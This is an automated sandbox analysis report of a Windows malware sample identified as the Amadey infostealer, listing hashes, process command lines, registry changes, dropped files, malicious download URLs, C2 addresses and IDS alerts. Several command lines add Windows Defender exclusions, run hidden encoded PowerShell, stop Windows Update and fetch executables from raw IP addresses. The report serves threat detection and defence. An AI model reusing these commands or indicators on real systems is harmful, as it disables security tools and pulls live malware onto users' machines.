File name: | SecuriteInfo.com.IL.Trojan.MSILZilla.30386.95.11942 |
Full analysis: | https://app.any.run/tasks/f5a2c572-3a48-40ee-ac49-32754803fb0c |
Verdict: | Malicious activity |
Threats: | Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks. |
Analysis date: | November 09, 2023, 06:50:40 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows |
MD5: | 65ACBF192DDEF924085504F07E559AD7 |
SHA1: | 991FFA6FAE12E521118BF1800FB9D534037C04FC |
SHA256: | CCCC4690ACE16E44F44473C2DF179B5B17E27F863B33ABDA126199014CB224D8 |
SSDEEP: | 6144:lWtuykMCEGs7e4IaLLWCfxMRhU+G36vzgymktD2FqJFCS7tQPD7f8u4GnfF5Kuwj:otuykbEGs7e4IWyCob6LHEB5rMT |
.exe | | | Win64 Executable (generic) (49.4) |
---|---|---|
.scr | | | Windows screen saver (23.4) |
.dll | | | Win32 Dynamic Link Library (generic) (11.7) |
.exe | | | Win32 Executable (generic) (8) |
.exe | | | Generic Win/DOS Executable (3.5) |
MachineType: | Intel 386 or later, and compatibles |
---|---|
TimeStamp: | 2023:11:07 19:07:31+01:00 |
ImageFileCharacteristics: | Executable, Large address aware |
PEType: | PE32 |
LinkerVersion: | 48 |
CodeSize: | 433075 |
InitializedDataSize: | 3584 |
UninitializedDataSize: | - |
EntryPoint: | 0x6bbad |
OSVersion: | 4 |
ImageVersion: | - |
SubsystemVersion: | 4 |
Subsystem: | Windows GUI |
FileVersionNumber: | 6.34.311.48 |
ProductVersionNumber: | 6.34.311.48 |
FileFlagsMask: | 0x003f |
FileFlags: | (none) |
FileOS: | Win32 |
ObjectFileType: | Executable application |
FileSubtype: | - |
LanguageCode: | Neutral |
CharacterSet: | Unicode |
CompanyName: | IWaYiCOgA |
FileDescription: | AvOvEma AKiJoAaGI eUUwUNaAiwE AKeuIkiv EVAfA uzUlaLu edayu OLEPuP. |
FileVersion: | 6.34.311.48 |
InternalName: | AnAZUXoX |
LegalCopyright: | © 2023 IWaYiCOgA. |
OriginalFileName: | aEoJOoA |
ProductName: | iEOKapuooy |
ProductVersion: | 6.34.311.48 |
Comments: | OhaOOb UhiVoVi uTInusA IPok EDeHiI isedOcOj aOExIV oqIJeNeu IrOraIExU. |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
244 | "C:\Users\admin\Pictures\vrMlHFrJEre4vJcGRewvCkDG.exe" | C:\Users\admin\Pictures\vrMlHFrJEre4vJcGRewvCkDG.exe | CasPol.exe | ||||||||||||
User: admin Integrity Level: HIGH Exit code: 0 Modules
| |||||||||||||||
284 | "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64 | C:\Windows\SysWOW64\reg.exe | — | wscript.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Registry Console Tool Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
288 | "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VxrjVBYufVUn" /t REG_DWORD /d 0 /reg:32 | C:\Windows\SysWOW64\reg.exe | — | wscript.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Registry Console Tool Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
312 | "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\admin\Pictures\mHMPa76o5Y1e2xa5vGD4kYCd.exe" & del "C:\ProgramData\*.dll"" & exit | C:\Windows\SysWOW64\cmd.exe | — | mHMPa76o5Y1e2xa5vGD4kYCd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
460 | sc stop wuauserv | C:\Windows\System32\sc.exe | — | cmd.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: A tool to aid in developing services for WindowsNT Exit code: 1062 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
584 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\admin\AppData\Local\Temp\SecuriteInfo.com.IL.Trojan.MSILZilla.30386.95.11942.exe" -Force | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | — | SecuriteInfo.com.IL.Trojan.MSILZilla.30386.95.11942.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
600 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | — | taskeng.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
648 | "C:\Windows\system32\dllhost.exe" | C:\Windows\System32\dllhost.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: COM Surrogate Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
796 | "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NmcYmBndU" /t REG_DWORD /d 0 /reg:64 | C:\Windows\SysWOW64\reg.exe | — | wscript.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Registry Console Tool Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
952 | C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC" | C:\Windows\System32\schtasks.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
|
(PID) Process: | (1944) explorer.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.check.0 |
Operation: | write | Name: | CheckSetting |
Value: 01000000D08C9DDF0115D1118C7A00C04FC297EB01000000088AF72B0747534094337F63DE35C94A000000000200000000001066000000010000200000003A7AE26404D75DF41C31FF40C5EA8CE90BAF74FA9E9BD7A9ACA34C7048350C1E000000000E8000000002000020000000BD2D56D46506C12C41A6A70B10E79EE53CB79EF36FD2BA8CDD2460CB8F4BE86A300000009B5D1418CBF2EB49F3C4BD4C21D58CA55B82FA3D3ED08AF0EF59D6C7ECAFC1055FA323A80FF7C154B1C9B60253392B6640000000DED9FDCC168073324C3013F1BB125E066EB1A2F09FD2C8E7CC7A793AA992E21EF1C942BF7294D04E036428704009B863B1CB981B97312E2530E3E816780CF7C9 | |||
(PID) Process: | (3020) SecuriteInfo.com.IL.Trojan.MSILZilla.30386.95.11942.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (3020) SecuriteInfo.com.IL.Trojan.MSILZilla.30386.95.11942.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (3020) SecuriteInfo.com.IL.Trojan.MSILZilla.30386.95.11942.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (3020) SecuriteInfo.com.IL.Trojan.MSILZilla.30386.95.11942.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 | |||
(PID) Process: | (1088) CasPol.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (1088) CasPol.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (1088) CasPol.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (1088) CasPol.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 | |||
(PID) Process: | (1088) CasPol.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\156\52C64B7E |
Operation: | write | Name: | LanguageList |
Value: en-US |
PID | Process | Filename | Type | |
---|---|---|---|---|
584 | powershell.exe | C:\Users\admin\AppData\Local\Temp\whsg3whd.uj3.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:— | |||
584 | powershell.exe | C:\Users\admin\AppData\Local\Temp\ol1wploz.hoa.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:— | |||
1088 | CasPol.exe | C:\Users\admin\AppData\Local\qfjHtvN5u1Tb1jqoc19sLzZc.exe | html | |
MD5:FCAD815E470706329E4E327194ACC07C | SHA256:280D939A66A0107297091B3B6F86D6529EF6FAC222A85DBC82822C3D5DC372B8 | |||
1088 | CasPol.exe | C:\Users\admin\AppData\Local\Temp\CabA8AA.tmp | compressed | |
MD5:F3441B8572AAE8801C04F3060B550443 | SHA256:6720349E7D82EE0A8E73920D3C2B7CB2912D9FCF2EDB6FD98F2F12820158B0BF | |||
1088 | CasPol.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SKzpki8Tqr48N3x5Yks7kgYz.bat | text | |
MD5:D26623166462B5C38F029F5172DA76D7 | SHA256:175AD6A1C9F404C0B77B88F4B4B230506505104C28476FAE6CDF3C2449C60792 | |||
1088 | CasPol.exe | C:\Users\admin\AppData\Local\Temp\TarA8DC.tmp | binary | |
MD5:9441737383D21192400ECA82FDA910EC | SHA256:BC3A6E84E41FAEB57E7C21AA3B60C2A64777107009727C5B7C0ED8FE658909E5 | |||
1088 | CasPol.exe | C:\Users\admin\Pictures\Q55LBaQ0GHyj5hUM39vJpsbj.exe | html | |
MD5:FCAD815E470706329E4E327194ACC07C | SHA256:280D939A66A0107297091B3B6F86D6529EF6FAC222A85DBC82822C3D5DC372B8 | |||
1088 | CasPol.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BRETfSbWV4QmgcY9xvnbWv9S.bat | text | |
MD5:57DE6BA43A8460F69CAF82729E331A2C | SHA256:14B2213913C86C20715AB6ACD9EF46871790E7BED69C773375C8A5B4E7473DF4 | |||
1088 | CasPol.exe | C:\Users\admin\Pictures\IBYXbieN81AJAXFofh4mSEmZ.exe | executable | |
MD5:2969F0854C39B8675D1CC6FC184E466F | SHA256:10B1C07CDB1FCF27D73392369141B77671472DB7494B7234314C3DB3A7A10A79 | |||
1088 | CasPol.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\q95y0WADZ9dgu6sKOt1ONlub.bat | text | |
MD5:D6DAF94EF21334D7DB0488284F0E0A0E | SHA256:CB9C1D614FF3A754F7319F96BA0284972CEAA86D84369300D2334C01AB0F13D5 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2160 | mHMPa76o5Y1e2xa5vGD4kYCd.exe | GET | 200 | 116.203.165.60:2087 | http://116.203.165.60:2087/ | unknown | — | — | — |
1088 | CasPol.exe | GET | 200 | 194.49.94.67:80 | http://194.49.94.67/files/My2.exe | unknown | executable | 5.24 Mb | — |
1088 | CasPol.exe | GET | 200 | 85.209.11.204:80 | http://85.209.11.204/api/files/software/s5.exe | unknown | executable | 326 Kb | — |
2408 | IBYXbieN81AJAXFofh4mSEmZ.exe | GET | 200 | 85.209.11.204:80 | http://85.209.11.204/api/files/client/s51 | unknown | executable | 887 Kb | — |
1088 | CasPol.exe | GET | 200 | 5.42.67.10:80 | http://5.42.67.10/setupdownload.exe | unknown | executable | 1.41 Mb | — |
1088 | CasPol.exe | GET | 200 | 95.140.236.128:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?56e02b563dbccaec | unknown | compressed | 61.6 Kb | — |
2408 | IBYXbieN81AJAXFofh4mSEmZ.exe | GET | 200 | 85.209.11.204:80 | http://85.209.11.204/ip.php | unknown | text | 13 b | — |
1088 | CasPol.exe | GET | 301 | 185.26.182.112:80 | http://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 | unknown | html | 162 b | — |
2160 | mHMPa76o5Y1e2xa5vGD4kYCd.exe | POST | 200 | 116.203.165.60:2087 | http://116.203.165.60:2087/ | unknown | text | 2 b | — |
2160 | mHMPa76o5Y1e2xa5vGD4kYCd.exe | POST | 200 | 116.203.165.60:2087 | http://116.203.165.60:2087/ | unknown | text | 1.52 Kb | — |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1088 | CasPol.exe | 172.67.34.170:443 | pastebin.com | CLOUDFLARENET | US | unknown |
4 | System | 192.168.100.255:137 | — | — | — | unknown |
1088 | CasPol.exe | 104.21.93.225:443 | flyawayaero.net | CLOUDFLARENET | — | unknown |
1088 | CasPol.exe | 194.49.94.85:443 | 632432.space | Enes Koken | DE | unknown |
1088 | CasPol.exe | 104.21.32.208:443 | lycheepanel.info | CLOUDFLARENET | — | unknown |
1088 | CasPol.exe | 179.61.12.110:443 | globalsystemperu.com | TECNOWEB PERU SAC | CL | unknown |
1088 | CasPol.exe | 194.49.94.67:80 | — | Enes Koken | DE | unknown |
1088 | CasPol.exe | 85.209.11.204:80 | — | LLC Baxet | RU | unknown |
1088 | CasPol.exe | 5.42.67.10:80 | — | CJSC Kolomna-Sviaz TV | RU | unknown |
1088 | CasPol.exe | 185.26.182.112:80 | net.geo.opera.com | Opera Software AS | — | unknown |
Domain | IP | Reputation |
---|---|---|
pastebin.com |
| unknown |
flyawayaero.net |
| unknown |
gobo11fc.top |
| unknown |
632432.space |
| unknown |
galandskiyher5.com |
| unknown |
lycheepanel.info |
| unknown |
net.geo.opera.com |
| unknown |
globalsystemperu.com |
| unknown |
yip.su |
| unknown |
ctldl.windowsupdate.com |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET DNS Query to a *.top domain - Likely Hostile |
— | — | Potentially Bad Traffic | ET DNS Query for .su TLD (Soviet Union) Often Malware Related |
— | — | Potentially Bad Traffic | ET INFO Executable Download from dotted-quad Host |
— | — | Potential Corporate Privacy Violation | AV POLICY HTTP request for .exe file with no User-Agent |
— | — | Potentially Bad Traffic | ET INFO Executable Download from dotted-quad Host |
— | — | Potentially Bad Traffic | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile |
— | — | Potential Corporate Privacy Violation | AV POLICY HTTP request for .exe file with no User-Agent |
— | — | Misc activity | ET INFO Packed Executable Download |
— | — | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
— | — | Potentially Bad Traffic | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response |